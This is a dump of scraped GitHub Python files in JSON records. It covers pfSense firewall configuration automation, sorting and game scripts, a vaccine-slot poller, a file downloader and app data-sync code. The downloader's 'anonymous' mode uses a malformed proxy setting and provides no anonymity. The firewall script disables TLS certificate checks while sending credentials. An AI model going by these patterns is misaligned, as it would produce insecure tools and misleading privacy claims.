'lifetime': '9999',\r\n 'save': 'Save'\r\n }\r\n\r\n #print(f'DEBUG CRL FORM DATA: {data}')\r\n \r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/system_crlmanager.php'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n # sending form of ca import:\r\n r = self.http_session.post(f'{self.baseurl}/system_crlmanager.php?act=new&caref={existing_ca_info[target_ca_name]}', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n print(f'CRL {crl[\"descr\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n #print(f'erro ao importar CA. 
detalhes: {r.text}')\r\n print(f'erro ao importar crl {crl[\"descr\"]}.')\r\n return False\r\n \r\n \r\n ## TODO\r\n # Register certificates present in CRL.\r\n # set certificates that make part of crl\r\n #r = self.http_session.get(f'{self.baseurl}/system_crlmanager.php?act=new&caref={existing_ca_info[target_ca[\"descr\"]]}', verify=False )\r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def import_openvpn_server(self, openvpn_config):\r\n # acessing form of new vpn ( vpn -> openvpn -> servers )\r\n r = self.http_session.get(f'{self.baseurl}/vpn_openvpn_server.php?act=new', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'description': openvpn_config[\"description\"],\r\n 'mode': openvpn_config[\"mode\"],\r\n 'protocol': 'UDP',\r\n 'dev_mode': openvpn_config[\"dev_mode\"],\r\n 'interface': openvpn_config[\"interface\"],\r\n 'local_port': openvpn_config[\"local_port\"],\r\n 'tlsmode': openvpn_config[\"tls_type\"],\r\n 'tls': b64decode(openvpn_config[\"tls\"]).decode(),\r\n 'caref': openvpn_config[\"caref\"],\r\n 'crlref': openvpn_config[\"crlref\"],\r\n 'certref': openvpn_config[\"certref\"],\r\n 'crypto': openvpn_config[\"data_ciphers\"].split(\",\")[0],\r\n 'digest': openvpn_config[\"digest\"],\r\n 'cert_depth': openvpn_config[\"cert_depth\"],\r\n 'tunnel_network': openvpn_config[\"tunnel_network\"],\r\n 'tunnel_networkv6': '',\r\n 'local_network': openvpn_config[\"local_network\"],\r\n 'local_networkv6': '',\r\n 'remote_network': openvpn_config[\"remote_network\"],\r\n 'remote_networkv6': '',\r\n 'maxclients': openvpn_config[\"maxclients\"],\r\n 'compression': openvpn_config[\"compression\"],\r\n 'dynamic_ip': openvpn_config[\"dynamic_ip\"],\r\n 'netbios_ntype': openvpn_config[\"netbios_ntype\"],\r\n 'netbios_scope': openvpn_config[\"netbios_scope\"],\r\n 'custom_options': openvpn_config[\"custom_options\"],\r\n 'verbosity_level': openvpn_config[\"verbosity_level\"],\r\n 'reneg-sec': '',\r\n 'save': 'Save',\r\n 'act': 'new'\r\n }\r\n \r\n # fix for data\r\n if 'authmode' in openvpn_config:\r\n data['authmode[]'] = openvpn_config[\"authmode\"]\r\n if not 'UDP' in openvpn_config[\"protocol\"]:\r\n data[\"protocol\"] = openvpn_config[\"protocol\"]\r\n if 'dns_domain' in openvpn_config:\r\n data['dns_domain_enable'] = 'yes'\r\n data['dns_domain'] = openvpn_config[\"dns_domain\"]\r\n data['dns_server_enable'] = 'yes'\r\n data['dns_server1'] = openvpn_config[\"dns_server1\"]\r\n data['dns_server2'] = openvpn_config[\"dns_server2\"]\r\n data['dns_server3'] = openvpn_config[\"dns_server3\"]\r\n data['dns_server4'] = openvpn_config[\"dns_server4\"]\r\n data['push_register_dns'] = 'yes'\r\n if openvpn_config[\"username_as_common_name\"] == 'enabled':\r\n data['cso_login_matching'] = 'yes'\r\n\r\n #print(f'DEBUG VPN: {data}')\r\n\r\n #headers = r.headers\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = 
f'{self.baseurl}/vpn_openvpn_server.php?act=new'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n # sending form of ca import:\r\n r = self.http_session.post(f'{self.baseurl}/vpn_openvpn_server.php?act=new', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n print(f'VPN {data[\"description\"]} importada com sucesso!')\r\n return True\r\n \r\n else:\r\n #print(f'erro ao importar CA. detalhes: {r.text}')\r\n print(f'erro ao importar vpn {data[\"description\"]}.')\r\n return False\r\n \r\n \r\n \r\n \r\n #\r\n #\r\n #\r\n def add_auth_server(self, auth_config):\r\n # acessing form of new auth server (system->access->servers)\r\n r = self.http_session.get(f'{self.baseurl}/system_authservers.php?act=new', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n self.hidden_name: self.hidden_value,\r\n 'name': auth_config[\"name\"],\r\n 'type': auth_config[\"type\"],\r\n 'ldap_host': auth_config[\"host\"],\r\n 'ldap_port': auth_config[\"ldap_port\"],\r\n 'ldap_urltype': auth_config[\"ldap_urltype\"],\r\n 'ldap_protver': auth_config[\"ldap_protver\"],\r\n 'ldap_binddn': auth_config[\"ldap_binddn\"],\r\n 'ldap_bindpw': auth_config[\"ldap_bindpw\"],\r\n 'ldap_scope': auth_config[\"ldap_scope\"],\r\n 'ldap_basedn': auth_config[\"ldap_basedn\"],\r\n 'ldapauthcontainers': auth_config[\"ldap_authcn\"],\r\n 'ldap_tmpltype': 'msad',\r\n 'ldap_attr_user': auth_config[\"ldap_attr_user\"],\r\n 'save': 'Save'\r\n }\r\n \r\n # fix for data\r\n if auth_config[\"ldap_urltype\"] == \"SSL/TLS Encrypted\":\r\n data[\"ldap_urltype\"] = \"SSL - Encrypted\"\r\n if auth_config[\"ldap_urltype\"] == \"STARTTLS Encrypted\":\r\n data[\"ldap_urltype\"] = \"StartTLS\"\r\n if auth_config[\"ldap_extended_enabled\"] == \"yes\":\r\n data[\"ldap_extended_query\"] = auth_config[\"ldap_extended_query\"]\r\n \r\n \r\n #print(f'DEBUG AUTHSERVER: {data}')\r\n \r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/vpn_openvpn_server.php?act=new'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n # sending form of new auth server:\r\n r = self.http_session.post(f'{self.baseurl}/system_authservers.php?act=new', verify=False, allow_redirects=False, data=data, headers=headers)\r\n #print(f'DEBUG: {r.request.body}')\r\n #print(f'DEBUG: {r.request.headers}')\r\n \r\n if r.status_code == 302:\r\n print(f'AUTH {data[\"name\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao importar authserver {data[\"name\"]}.')\r\n return False\r\n\r\n\r\n \r\n \r\n #\r\n #\r\n #\r\n def add_static_route(self, route_config):\r\n # acessing form of new static route (system->routes->configuration)\r\n r = self.http_session.get(f'{self.baseurl}/ui/routes', verify=False )\r\n \r\n # getting the page token\r\n # match = re.search('input type=\"hidden\" 
name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n # if match is None:\r\n # print(f'error parsing token on firewall main page')\r\n # sys.exit(0)\r\n # self.hidden_name = match.group(\"fieldname\")\r\n # self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = {\r\n \"route\":{\r\n \"disabled\":\"0\",\r\n \"network\": route_config[\"network\"],\r\n \"gateway\": route_config[\"gateway\"],\r\n \"descr\": route_config[\"descr\"]\r\n }\r\n }\r\n \r\n \r\n #print(f'DEBUG route: {data}')\r\n #return\r\n \r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/vpn_openvpn_server.php?act=new'\r\n headers[\"x-requested-with\"] = \"XMLHttpRequest\"\r\n\r\n \r\n # sending form of new route:\r\n r = self.http_session.post(f'{self.baseurl}/api/routes/routes/addroute/', verify=False, json=data, headers=headers)\r\n \r\n if r.status_code == 200:\r\n print(f'ROUTE {data[\"route\"][\"descr\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao importar rota {data[\"route\"][\"descr\"]}.')\r\n return False\r\n\r\n\r\n\r\n #\r\n #\r\n #\r\n def set_dhcpd_config(self, dhcpd_config):\r\n # acessing form of dhcp configuration\r\n r = self.http_session.get(f'{self.baseurl}/services_dhcp.php?if={dhcpd_config[\"if\"]}', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = dhcpd_config\r\n data[\"submit\"] = \"Save\"\r\n data[self.hidden_name] = self.hidden_value\r\n \r\n \r\n print(f'DEBUG dhcpd: {data}')\r\n #return\r\n \r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/services_dhcp.php?if={data[\"if\"]}'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n\r\n \r\n # sending form of new dhcp instance config:\r\n r = self.http_session.post(f'{self.baseurl}/services_dhcp.php?if={data[\"if\"]}', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n #print(f'debug status: {r.headers}, {r.text}')\r\n print(f'DHCP CONFIG {data[\"if\"]} importado com sucesso!')\r\n return True\r\n \r\n else:\r\n print(f'erro ao importar config dhcp {data[\"if\"]}.')\r\n print(r.text)\r\n return False\r\n\r\n\r\n\r\n\r\n #\r\n #\r\n #\r\n def add_dhcpd_static_lease(self, lease):\r\n # acessing form of dhcp configuration\r\n r = self.http_session.get(f'{self.baseurl}/services_dhcp_edit.php?if={lease[\"if\"]}', verify=False )\r\n \r\n # getting the page token\r\n match = re.search('input type=\"hidden\" name=\"(?P[^\"]+)\" value=\"(?P[^\"]+)', r.text)\r\n if match is None:\r\n print(f'error parsing token on firewall 
main page')\r\n sys.exit(0)\r\n self.hidden_name = match.group(\"fieldname\")\r\n self.hidden_value = match.group(\"fieldvalue\")\r\n\r\n # check x-csrftoken\r\n match = re.search('setRequestHeader\\(\"X-CSRFToken\", \"(?P[^\"]+)\"', r.text)\r\n if match is None:\r\n print(f'failed to get X-CSRFToken')\r\n sys.exit(0)\r\n else:\r\n #print(f'got X-CSRFToken as {match.group(\"csrftoken\")}')\r\n self.csrf_token = match.group(\"csrftoken\")\r\n \r\n data = lease\r\n data[\"submit\"] = \"Save\"\r\n data[self.hidden_name] = self.hidden_value\r\n \r\n \r\n #print(f'DEBUG dhcpd: {data}')\r\n #return\r\n \r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/services_dhcp_edit.php?if={data[\"if\"]}'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n\r\n\r\n # sending form of new static lease:\r\n r = self.http_session.post(f'{self.baseurl}/services_dhcp_edit.php?if={data[\"if\"]}', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n #print(f'debug status: {r.headers}, {r.text}')\r\n print(f'DHCP STATIC LEASE {data[\"descr\"]} importado com sucesso!')\r\n \r\n else:\r\n print(f'erro ao importar dhcp static lease {data[\"descr\"]}.')\r\n #print(r.text)\r\n return False\r\n \r\n \r\n # applying configuration\r\n headers = {}\r\n headers[\"X-CSRFToken\"] = self.csrf_token\r\n headers[\"referer\"] = f'{self.baseurl}/services_dhcp_edit.php?if={data[\"if\"]}'\r\n headers[\"content-type\"] = \"application/x-www-form-urlencoded\"\r\n \r\n data = {\r\n 'apply': 'Apply changes',\r\n 'if': data[\"if\"]\r\n }\r\n \r\n # sending apply action\r\n r = self.http_session.post(f'{self.baseurl}/services_dhcp.php?if={data[\"if\"]}', verify=False, allow_redirects=False, data=data, headers=headers)\r\n \r\n if r.status_code == 302:\r\n # successfuly applied configuration\r\n return True\r\n else:\r\n print(f'erro ao aplicar configuração do dhcp leases.')\r\n return False\r\n\r\n\r\n\r\n\r\n","repo_name":"CitraIT/migrate_pfsense","sub_path":"src/firewall.py","file_name":"firewall.py","file_ext":"py","file_size_in_byte":35311,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"12934473390","text":"from OFA import *\n\nOptimum_Size = 32\n#Impacts On Chunk Size\n#Change Value For Tuning Program Efficiency\n#Approx Best 32 - 64\n\ndef CalcMinRun(n):\n\twhile n >= Optimum_Size:\n\t\tn = n>> 1\n\treturn n+1\n\ndef insertion_sort(arr,start,end):\n\n\tfor i in range(start+1,end+1):\n\t\tk = arr[i]\n\n\t\tj = i - 1\n\t\twhile k.h < arr[j].h and j >= start:\n\t\t\tinsert(j+1,arr[j],arr)\n\t\t\tj -= 1\n\n\t\tinsert(j+1,k,arr)\n\treturn arr[start:end+1]\n\n\ndef merge_sort(arr,left,mid,right):\n\tlarr = arr[left:mid]\n\tlenl = mid - left\n\n\trarr = arr[mid:right+1]\n\tlenr = right - mid\n\n\tp1 = p2 = 0\n\tk = left\n\twhile p1= size: end = size-1\n\t\tinsertion_sort(lst,start,end)\n\n\t#Merge Sort\n\tchunk = runs\n\twhile chunk <= size:\n\t\tchunk = 2 * chunk\n\t\tfor start in range(0,size,chunk):\n\t\t\tleft = start\n\t\t\tmid = min(left+(chunk//2),size-1)\n\t\t\tright = min(left+chunk,size-1)\n\t\t\tif mid <= right:\n\t\t\t\tmerge_sort(lst,left,mid,right)\n\n\nif __name__ == \"__main__\":\n\ttk.title(\"TimSort\")\n\tgenerate()\n\tbtn1 = Button(tk, text = 'Shuffle', bd = '5', command = lambda: shuffle())\n\tbtn2 = Button(tk, text = 'Sort', bd = '5', command = lambda: sort())\n\tbtn1.pack(side='left')\n\tbtn2.pack(side='left')\n\ttk.mainloop() 
","repo_name":"Azanul/Sorting-Visualized","sub_path":"tim_sort.py","file_name":"tim_sort.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"45"} +{"seq_id":"35405380327","text":"import requests\nfrom fake_useragent import UserAgent\nimport json\nimport pandas as pd\nfrom datetime import datetime, timedelta\nfrom playsound import playsound\nimport multiprocessing\nfrom configparser import ConfigParser\nimport sched, time\n\n# TO GET THE STATE ID\n# https://cdn-api.co-vin.in/api/v2/admin/location/states\n\n\n# TO GET THE DISTRICT ID\n# https://cdn-api.co-vin.in/api/v2/admin/location/districts/{state_id}\n\ndef check_availibilty(sc):\n \n temp_user_agent = UserAgent()\n browser_header = {'User-Agent': temp_user_agent.random}\n \n presentday = datetime.now()\n tomorrow = presentday + timedelta(1)\n date = tomorrow.strftime('%d-%m-%Y')\n print(\"looping for date {}\".format(date))\n \n configur = ConfigParser()\n configur.read('config.ini')\n pincode = configur.get('location','pincode')\n district_id = configur.get('location','district')\n \n request_url_pincode = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByPin?pincode={}&date={}\".format(pincode, date)\n request_url_disrict_id = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByDistrict?district_id={}&date={}\".format(district_id, date)\n \n \n response = requests.get(request_url_disrict_id, headers=browser_header)\n resp_json = json.loads(response.text)['sessions']\n \n df = pd.DataFrame(resp_json)\n df_min_age_limit = df['min_age_limit']\n df_availabilty = df['available_capacity_dose1']\n for key, value in df_availabilty.iteritems():\n if df_min_age_limit[key] == 18 and value > 0:\n print(key, value)\n playsound('Coldplay - Fix You.mp3')\n # Might as well play a song :p\n p = multiprocessing.Process(target=playsound, args=(\"Coldplay - Fix You.mp3\",))\n p.start()\n input(\"press ENTER to stop playback\")\n p.terminate()\n \n s.enter(4, 1, check_availibilty, (sc,))\n\ns = sched.scheduler(time.time, time.sleep)\ns.enter(0, 1, check_availibilty, (s,))\ns.run()\n\n\n\n","repo_name":"sarthakaggarwal97/cowin-vaccine-prompter","sub_path":"Vaccine Prompter.py","file_name":"Vaccine Prompter.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15575354082","text":"import copy\nfrom .item import Item\n\n\nclass Layer(Item):\n\n Item.registerProperties((\n { 'attr': 'name' },\n { 'attr': 'description' },\n { 'attr': 'order', 'type': int, 'default': -1 },\n { 'attr': 'notes' },\n { 'attr': 'active', 'type': bool, 'default': False },\n { 'attr': 'itemProperties', 'type': dict },\n { 'attr': 'storeGeometry', 'type': bool, 'default': False }\n ))\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.isLayer = True\n self._scene = kwargs.get('scene')\n if not 'itemProperties' in kwargs: # avoid shared default value instance\n self.prop('itemProperties').set({}, notify=False)\n\n def __repr__(self):\n return super().__repr__(exclude='itemProperties')\n\n def __lt__(self, other):\n if self.name() is not None and other.name() is None:\n return True\n elif self.name() is None and other.name() is not None:\n return False\n elif self.name() is None and other.name() is None:\n return True\n return self.name() < other.name()\n\n ## Cloning\n\n def clone(self, scene):\n from .layeritem import LayerItem\n x = 
super().clone(scene)\n stuff = copy.deepcopy(self.itemProperties())\n x.prop('itemProperties').set(None, notify=False) # avoid equality check\n x.prop('itemProperties').set(stuff, notify=False)\n for layerItem in scene.find(types=LayerItem):\n if self.id in layerItem.layers():\n layers = list(layerItem.layers())\n layers.append(x.id)\n layerItem.setLayers(layers)\n return x\n\n def remap(self, map):\n \"\"\" TODO: Map itemProperties. \"\"\"\n return False\n\n ## Properties\n\n def onProperty(self, prop):\n isChanged = False\n if prop.name() == 'storeGeometry' and not prop.get():\n # Setting `storeGeometry` to False clears geometry values\n itemProps = copy.deepcopy(self.itemProperties())\n for itemId, values in itemProps.items():\n if 'size' in values:\n del values['size']\n isChanged = True\n if 'itemPos' in values:\n del values['itemPos']\n isChanged = True\n super().onProperty(prop)\n if isChanged:\n self.setItemProperties(itemProps)\n if self.scene():\n self.scene().updateActiveLayers(force=True)\n\n\n ## Item property storage\n\n def itemName(self):\n return self.name()\n\n def setScene(self, scene):\n self._scene = scene\n\n def scene(self):\n return self._scene\n\n def getItemProperty(self, itemId, propName):\n # {\n # id: {\n # 'propName': value,\n # 'propName': value\n # }\n # }\n values = self.itemProperties().get(itemId)\n if values and propName in values:\n # self.here(self.id, itemId, propName, values[propName])\n return values[propName], True\n else:\n # self.here(self.id, itemId, propName, None)\n return None, False\n\n def setItemProperty(self, itemId, propName, value):\n props = self.itemProperties()\n if itemId in props:\n values = props[itemId]\n else:\n values = {}\n props[itemId] = values\n values[propName] = value\n self.setItemProperties(props, notify=False) # noop?\n item = self.scene().find(itemId)\n\n def resetItemProperty(self, prop):\n \"\"\" Called from Property.reset. 
\"\"\"\n props = self.itemProperties()\n itemProps = props.get(prop.item.id)\n if not itemProps:\n return\n changed = False\n if prop.name() in itemProps:\n del itemProps[prop.name()]\n changed = True\n if not itemProps:\n del props[prop.item.id]\n changed = True\n if changed:\n self.setItemProperties(props, notify=False)\n\n def resetAllItemProperties(self, notify=True, undo=None):\n for itemId, propValues in list(self.itemProperties().items()):\n item = self.scene().find(itemId)\n for propName in list(propValues.keys()):\n item.prop(propName).reset(notify=notify, undo=undo)\n self.setItemProperties({})\n\n\n","repo_name":"patrickkidd/familydiagram","sub_path":"pkdiagram/objects/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"43202396517","text":"from ntk.objects import gv as gv\nimport _help, requests, datetime\n\nfrom database.table import SyncResult, PaymentMethod\n\n\nclass Payment:\n def __init__(self, rself, *arg, **kwargs):\n super(Payment, self).__init__()\n self.arg = arg\n self.kwargs = kwargs\n self.rself = rself\n\n self.sync_down_payment_list(rself)\n\n def sync_down_payment_list(this, self):\n SyncResult().qset.update(**{'last_checked': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'status': 0, 'table_name': 'payment'}, where='table_name')\n\n try:\n data = {\"android\": 123}\n\n try:\n url = gv.website + \"app/paymentlist\"\n r = requests.post(url, data=data)\n paymentlist = r.json().get(\"data\").get(\"paymentinfo\")\n except:\n paymentlist = None\n\n if paymentlist:\n if gv.deep_sync:\n gv.rstatus_l.config(text=\"Deleting all records from payment method\")\n PaymentMethod().qset.delete_all()\n gv.rstatus_l.config(text=\"Deleted all records from payment method\")\n\n pcidl = [str(r['id']) for r in PaymentMethod().qset.filter(search='id').all()]\n cr_list, up_list = [], []\n\n for ix, c in enumerate(paymentlist):\n c['id'] = c.pop('payment_method_id')\n\n if gv.deep_sync:\n gv.rstatus_l.config(text=\"Adding record for payment method {} {}/{}\".format(c['payment_method'], ix+1, len(paymentlist)))\n cr_list.append(c)\n else:\n if c['id'] in pcidl:\n gv.rstatus_l.config(text=\"Updating record for payment method {} {}/{}\".format(c['payment_method'], ix+1, len(paymentlist)))\n up_list.append(c)\n else:\n gv.rstatus_l.config(text=\"Adding record for payment method {} {}/{}\".format(c['payment_method'], ix+1, len(paymentlist)))\n cr_list.append(c)\n\n if cr_list:\n PaymentMethod().qset.create_all(cr_list)\n if up_list:\n PaymentMethod().qset.update_all(up_list, where='id')\n\n SyncResult().qset.update(**{'last_update': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 'status': 1, 'table_name': 'payment'}, where='table_name')\n\n except Exception as e:\n gv.error_log(str(e))\n","repo_name":"saif43/bhojon","sub_path":"database/synchronization/down/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"41102625560","text":"import requests\nfrom sys import argv\nfrom tqdm import tqdm\nimport socket\nimport os\nfrom notifypy import Notify\n\n# argv to range 1:1000 and --> string\n# download argv input and example --> bimax [link download]\n\nargvS = argv[1:700]\n\nif (str(argvS) ==\"[]\"):\n os.system(\"clear\")\n print(r\"\"\"\n .______ __ .___ ___. 
___ ___ ___\n | _ \\ | | | \\/ | / \\ \\ \\ / /\n | |_) | | | | \\ / | / ^ \\ \\ V /\n | _ < | | | |\\/| | / /_\\ \\ > <\n | |_) | | | | | | | / _____ \\ / . \\\n |______/ |__| |__| |__| /__/ \\__\\ /__/ \\__\\\n\n [1] - Direct Download v1.01\n [2] - Download Anonymous v1.0.1\n \"\"\")\n try:\n NumberS = int(input(\"enter by number Downloader : \"))\n if NumberS == 1:\n url = str(input('enter link : '))\n name = url.split('/')[-1]\n\n\n notfiy = Notify()\n notfiy.message = f\"Downloading please wait...\"\n notfiy.title = name\n notfiy.icon = \"direct-download.png\"\n notfiy.send()\n\n\n respons = requests.get(url,stream=True)\n heead = int(respons.headers['Content-Length'])\n with open(name,'wb') as file:\n for data in tqdm(iterable=respons.iter_content(chunk_size=1024), total=heead / 1024, unit='KB'):\n file.write(data)\n\n elif NumberS == 2:\n url = str(input('enter link : '))\n name2 = url.split('/')[-1]\n\n notfiy2= Notify()\n notfiy2.message = f\"Downloading please wait...\"\n notfiy2.title = name2\n notfiy2.icon = \"direct-download.png\"\n notfiy2.send()\n\n ip_addr = socket.gethostname()\n hostname = socket.gethostbyname(ip_addr)\n respons = requests.get(url,stream=True,proxies={hostname:9050})\n heead = int(respons.headers['Content-Length'])\n\n with open(name2,'wb') as file:\n for data in tqdm(iterable=respons.iter_content(chunk_size=1024), total=heead / 1024, unit='KB'):\n file.write(data)\n\n except:\n print('error to download...')\n\n\nelse:\n try:\n\n name = argvS\n for i in name:\n pass\n si = str(i)\n print(si)\n\n notfiy3 = Notify()\n notfiy3.message = f\"Downloading please wait...\"\n notfiy3.title = si\n notfiy3.icon = \"direct-download.png\"\n notfiy3.send()\n\n respons = requests.get(si,stream=True)\n heead = int(respons.headers['Content-Length'])\n name_main = si.split('/')[-1]\n with open(name_main,'wb') as file:\n for data in tqdm(iterable=respons.iter_content(chunk_size=1024), total=heead / 1024, unit='KB'):\n file.write(data)\n except:\n pass\n","repo_name":"AhSiber/bimax-downloader","sub_path":"bimax-linux/bimax.py","file_name":"bimax.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"10281100436","text":"import random\r\nfrom random import randint\r\nimport traceback\r\n\r\ndef game():\r\n cara = \"-\" *36\r\n print(\"HI THERE\")\r\n print(cara)\r\n gennumber = str(random.randint(1000, 9999))\r\n gennumberarray = [int(i) for i in str(gennumber)]\r\n print(\"Solution key = \" + str(gennumber))\r\n print(\"I'VE GENERATED A RANDOM 4 DIGIT NUMBER FOR YOU.\")\r\n print(\"LET'S PLAY BULLS AND COWS GAME.\")\r\n print(cara)\r\n inputnumber = str(0)\r\n while inputnumber != gennumber:\r\n bulls = 0\r\n cows = 0\r\n x = 0\r\n y = 0\r\n i = 0\r\n\r\n try:\r\n inputnumber = int(input(\"ENTER A NUMBER: \"))\r\n\r\n except ValueError:\r\n print(\"Only number, please!\")\r\n return traceback.format_exc()\r\n\r\n\r\n print(cara)\r\n inputnumberarray = [int(i) for i in str(inputnumber)]\r\n if inputnumber >= 1000 and inputnumber <= 9999:\r\n\r\n while x != 4:\r\n if inputnumberarray[x] == gennumberarray[x]:\r\n bulls += 1\r\n x += 1\r\n\r\n i = len(list(set(inputnumberarray).intersection(gennumberarray)))\r\n\r\n cows = i - bulls\r\n if inputnumberarray == gennumberarray:\r\n print(\"YOU WIN\")\r\n break\r\n\r\n if bulls == 1:\r\n if cows == 1:\r\n print(str(bulls) + \" bull, \" + str(cows) + \" cow\")\r\n elif cows > 1 or cows == 0:\r\n print(str(bulls) + \" bull, \" + 
str(cows) + \" cows\")\r\n elif bulls > 1 or bulls <= 0:\r\n if cows == 1:\r\n print(str(bulls) + \" bulls, \" + str(cows) + \" cow\")\r\n elif cows > 1 or cows <= 0:\r\n print(str(bulls) + \" bulls, \" + str(cows) + \" cows\")\r\n elif inputnumber not in gennumber:\r\n print(\"Neplatná volba\")\r\n print(cara)\r\n\r\n elif inputnumber < 1000 or inputnumber > 9999:\r\n print(\"NUMBER WITH INCORRECT LENGHT INPUTTED!\")\r\n print(cara)\r\n\r\n break\r\n\r\n\r\n\r\ngame()","repo_name":"Petula24/Projekty","sub_path":"oprava_projekt_2.py.py","file_name":"oprava_projekt_2.py.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"40226097045","text":"class Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n p1, p2 = nums[0], nums[0]\n # python don't have do while\n # 找到两个指针的交点\n while True:\n p1 = nums[p1]\n p2 = nums[nums[p2]]\n if p1 == p2:\n break\n # 因为是确定有重复,所以这里不用else\n \n # 找到环的入口,解题方案真的贼像142\n # \n pt1, pt2 = nums[0], p2\n while pt1 != pt2:\n pt1 = nums[pt1]\n pt2 = nums[pt2]\n \n return pt1\n","repo_name":"huosan0123/leetcode-py","sub_path":"287.py","file_name":"287.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"74216758217","text":"class Room(object):\n\n def __init__(self, x=0, y=0, description='', contains='', exits=None):\n\n self.x = x\n self.y = y\n self.description = description\n self.contains = contains\n if exits is None:\n self.exits = ['north','south','east','west']\n else:\n self.exits = exits\n\nclass Items(object):\n\n def __init__(self, name='', observe=''):\n self.name = name\n self.observe = observe\n\nclass SpecialItem(Items):\n\n def full_text(self):\n return \"{} - {}\".format(self.name, 